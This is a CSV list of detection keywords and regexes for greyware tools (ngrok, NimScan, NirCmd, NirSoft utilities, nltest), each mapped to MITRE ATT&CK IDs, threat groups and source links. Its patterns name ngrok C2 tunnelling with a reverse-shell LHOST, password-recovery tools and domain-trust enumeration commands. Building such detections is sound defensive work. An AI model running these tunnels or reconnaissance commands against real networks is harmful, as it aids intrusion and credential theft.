"*\ngrokd.go*",".{0,1000}\\ngrokd\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*6abfc342f0a659066c8b42999510ccc3592b499569c2e7af37470a445a2e3560*",".{0,1000}6abfc342f0a659066c8b42999510ccc3592b499569c2e7af37470a445a2e3560.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","#filehash","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*fe9dd722a085bce94fe2403f8d02e20becf0f0faa019d0789fadf35b66611a46*",".{0,1000}fe9dd722a085bce94fe2403f8d02e20becf0f0faa019d0789fadf35b66611a46.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","#filehash","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*http://*.ngrok.io*","http\:\/\/.{0,1000}\.ngrok\.io.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*http://127.0.0.1:4040/api/tunnels*",".{0,1000}http\:\/\/127\.0\.0\.1\:4040\/api\/tunnels.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*https://*.ngrok.io*","https\:\/\/.{0,1000}\.ngrok\.io.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*inconshreveable/ngrok*",".{0,1000}inconshreveable\/ngrok.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*LHOST=0.tcp.ngrok.io*",".{0,1000}LHOST\=0\.tcp\.ngrok\.io.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*Mozilla/5.0 (compatible; ngrok)*",".{0,1000}Mozilla\/5\.0\s\(compatible\;\sngrok\).{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*ngrok tcp *",".{0,1000}ngrok\stcp\s.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*ngrok, Inc.*",".{0,1000}ngrok,\sInc\..{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*ngrokd.ngrok.com*",".{0,1000}ngrokd\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*tcp://0.tcp.ngrok.io:*",".{0,1000}tcp\:\/\/0\.tcp\.ngrok\.io\:.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*tunnel.ap.ngrok.com*",".{0,1000}tunnel\.ap\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*tunnel.au.ngrok.com*",".{0,1000}tunnel\.au\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*tunnel.eu.ngrok.com*",".{0,1000}tunnel\.eu\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*tunnel.in.ngrok.com*",".{0,1000}tunnel\.in\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*tunnel.jp.ngrok.com*",".{0,1000}tunnel\.jp\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*tunnel.sa.ngrok.com*",".{0,1000}tunnel\.sa\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*tunnel.us.ngrok.com*",".{0,1000}tunnel\.us\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"* NimScan.exe*",".{0,1000}\sNimScan\.exe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"* NimScan.nim*",".{0,1000}\sNimScan\.nim.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*/NimScan.exe*",".{0,1000}\/NimScan\.exe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*/NimScan.git*",".{0,1000}\/NimScan\.git.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*/NimScan.nim*",".{0,1000}\/NimScan\.nim.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*\NimScan.exe*",".{0,1000}\\NimScan\.exe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*\NimScan.nim*",".{0,1000}\\NimScan\.nim.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*>NimScan<*",".{0,1000}\>NimScan\<.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*162b04e6c89653b10bd38def513051067393d9080afd777210b0ce44f1a7d9fe*",".{0,1000}162b04e6c89653b10bd38def513051067393d9080afd777210b0ce44f1a7d9fe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*394daa8e246f41baa4f37b1721991248f003766f079e671b8e51794259818c91*",".{0,1000}394daa8e246f41baa4f37b1721991248f003766f079e671b8e51794259818c91.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*662d9dd3a88b004a8eb3e5944457a1661ec7a28dd4695d6f96fbcbf095ba057a*",".{0,1000}662d9dd3a88b004a8eb3e5944457a1661ec7a28dd4695d6f96fbcbf095ba057a.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*72605e93bf880f32e23eb3b5d1ab30a66c7a2beb3c195d5d2bc5738e1b7ddbf5*",".{0,1000}72605e93bf880f32e23eb3b5d1ab30a66c7a2beb3c195d5d2bc5738e1b7ddbf5.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*9084acb8a61d051af66cad27ceb81976c45c4378e9846a22d8befe3294217e7d*",".{0,1000}9084acb8a61d051af66cad27ceb81976c45c4378e9846a22d8befe3294217e7d.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*b6911a2d3730f3bbcd89d503ac1226d6e6172cb49d3c92d04df933ef3c9e1531*",".{0,1000}b6911a2d3730f3bbcd89d503ac1226d6e6172cb49d3c92d04df933ef3c9e1531.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*ca96a1f8836f1c1afdf2c410e9d686f7beca7784e859971a493a6610522708e2*",".{0,1000}ca96a1f8836f1c1afdf2c410e9d686f7beca7784e859971a493a6610522708e2.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*dacdb4976fd75ab2fd7bb22f1b2f9d986f5d92c29555ce2b165c020e2816a200*",".{0,1000}dacdb4976fd75ab2fd7bb22f1b2f9d986f5d92c29555ce2b165c020e2816a200.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*e43d66b7a4fa09a0714c573fbe4996770d9d85e31912480e73344124017098f9*",".{0,1000}e43d66b7a4fa09a0714c573fbe4996770d9d85e31912480e73344124017098f9.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*elddy/NimScan*",".{0,1000}elddy\/NimScan.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*-l:NimScanToC.a *",".{0,1000}\-l\:NimScanToC\.a\s.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*netsh advfirewall firewall add rule name='NimScan'*",".{0,1000}netsh\sadvfirewall\sfirewall\sadd\srule\sname\=\'NimScan\'.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*NimScan * -p:*",".{0,1000}NimScan\s.{0,1000}\s\-p\:.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"*NimScan finished in:*",".{0,1000}NimScan\sfinished\sin\:.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z"
"* nircmd.exe*",".{0,1000}\snircmd\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* nircmdc.exe*",".{0,1000}\snircmdc\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nircmd.exe*",".{0,1000}\/nircmd\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nircmd.zip*",".{0,1000}\/nircmd\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nircmdc.exe*",".{0,1000}\/nircmdc\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nircmd-x64.zip*",".{0,1000}\/nircmd\-x64\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nircmd.exe*",".{0,1000}\\nircmd\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nircmd.zip*",".{0,1000}\\nircmd\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nircmdc.exe*",".{0,1000}\\nircmdc\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nircmd-x64.zip*",".{0,1000}\\nircmd\-x64\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*nircmd.exe *",".{0,1000}nircmd\.exe\s.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*nircmdc.exe *",".{0,1000}nircmdc\.exe\s.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://www.nirsoft.net/toolsdownload/*",".{0,1000}https\:\/\/www\.nirsoft\.net\/toolsdownload\/.{0,1000}","greyware_tool_keyword","nirsoft tools","NirSoft is a legitimate software company that develops system utilities for Windows. Some of its tools can be used by malicious actors to recover passwords harvest sensitive information and conduct password attacks.","T1003 - T1003.001 - T1003.002 - T1110 - T1566","TA0002 - TA0003 - TA0004 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Collection","N/A","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*https://www.nirsoft.net/toolsdownload/*.exe*",".{0,1000}https\:\/\/www\.nirsoft\.net\/toolsdownload\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*https://www.nirsoft.net/toolsdownload/*.zip*",".{0,1000}https\:\/\/www\.nirsoft\.net\/toolsdownload\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*https://www.nirsoft.net/utils/*.exe*",".{0,1000}https\:\/\/www\.nirsoft\.net\/utils\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*https://www.nirsoft.net/utils/*.zip*",".{0,1000}https\:\/\/www\.nirsoft\.net\/utils\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*nltest  /dclist:*",".{0,1000}nltest\s\/dclist\:.{0,1000}","greyware_tool_keyword","nltest","Get the list of domain controllers for the specified domain","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /all_trusts*",".{0,1000}nltest\s\/all_trusts.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /dclist*",".{0,1000}nltest\s\/dclist.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /domain_trusts /v*",".{0,1000}nltest\s\/domain_trusts\s\/v.{0,1000}","greyware_tool_keyword","nltest","Dump Domain Trust Information","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /domain_trusts*",".{0,1000}nltest\s\/domain_trusts.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /dsgetdc:* /force*",".{0,1000}nltest\s\/dsgetdc\:.{0,1000}\s\/force.{0,1000}","greyware_tool_keyword","nltest","Force a re-discovery of Domain Controller","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /dsgetdc:* /force*",".{0,1000}nltest\s\/dsgetdc\:.{0,1000}\s\/force.{0,1000}","greyware_tool_keyword","nltest","Force a re-discovery of trusted domains","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
